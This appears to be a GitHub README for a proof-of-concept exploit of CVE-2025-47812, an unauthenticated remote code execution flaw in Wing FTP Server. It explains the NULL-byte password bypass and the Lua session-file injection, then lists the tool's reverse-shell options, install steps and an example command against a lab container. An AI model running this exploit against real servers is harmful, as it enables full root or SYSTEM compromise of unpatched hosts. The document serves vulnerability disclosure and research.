CVE-2025-47812 Improper input validation led to Remote Code Execution to full system compromise
Julien Ahrens from RCE Security discovered a critical security vulnerability impacting WingFTP. Tracked as CVE-2025-47812, the vulnerability has a CVSS score of 10. Successful exploitation of the vulnerability may allow a remote unauthenticated attacker to execute arbitrary code, leading to complete system compromise.
Wing FTP Server is cross-platform, user-friendly, and secure FTP server software. It supports multiple file transfer protocols, such as FTP, FTPS, HTTP, HTTPS, and SFTP, allowing flexibility for client connections.
To research CVE-2025-47812, I deployed a Docker container running Wing FTP Server 7.4.3 on a Linux host. The container was configured to expose the web interface, and I enabled anonymous login for easier unauthenticated testing. Additionally, a test user account (dev-test:test) was created to simulate authenticated scenarios. This setup provided a safe and controlled environment to reproduce the vulnerability and validate exploit behavior.
-
CVE ID: CVE-2025-47812
-
CVSS v3.1 Vector:
-
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
-
Base Score: 10.0 (Critical)
-
Affected Software: <= 7.4.3
-
Impact: Remote Code Execution led to Full system compromise.
-
Exploitation Prerequisites:
-
Anonymous Login allowed or valid user credential
-
No sudo permissions required for the user
-
When a user try to login it calls the c_CheckUser call which always returns OK_CHECK_CONNECTION regardless of what comes after the NULL byte in the username, as long as the string before the NULL byte matches an existing user. An attacker may exploit the vulnerability by adding a NULL byte and extra values to a known username to bypass the password check. The system uses strlen() on our username to get the string size, but strlen only counts all the characters until it reaches the NULL-byte terminator to match the unsanitized username.
The unsanitized username (including the injected NULL and brainy payload) is stored directly into session files as Lua code. These session files resemble .lua and are later executed when sessions are loaded. On Linux, Wing FTP server runs as root; on Windows, it runs as SYSTEM. The injected Lua payload runs with full privileges upon session reload.
Note : This behaviour is only happening if the password is not set or with a valid credentials. It enforcing some strict password validation if password is set for the user.
Options:
-t, --target Target Wing FTP Server URL (e.g., http://192.168.1.100)
-u, --username Username to authenticate (default: anonymous)
-p, --password Password to authenticate (default: empty)
-lh, --lhost Local host to listen for reverse shell (default: 127.0.0.1)
-lp, --lport Local port to listen for reverse shell (default: 31337)
-ns, --no-shell To specify the exploit to not span a temp shell. (Note if it set should manually set listener)
-v, --verbose Enable verbose/debug output
-h, --help Show this help message and exit
git clone https://github.com/pevinkumar10/CVE-2025-47812
cd CVE-2025-47812
pip3 install -r requirements.txt
CVE-2025-47812 - Wing FTP Server Unauthenticated RCE
CVE-2025-47812 - Wing FTP Server authenticated RCE (dev-test:test)
Example usage:
python3 exploit.py --target http://172.17.0.2 --lhost 172.17.0.1 -lport 31336 -
Users must upgrade to WingFTP version 7.4.4 to patch the vulnerability.
-
Please refer to the WingFTP Release Notes for more information.
Note : I used the above reference for research purpose and updated the exploit with more fetures and robust error handling.
This Python PoC is released under the MIT License. The original exploit concept and disclosure credit belong to the Stratascale Cyber Research Unit.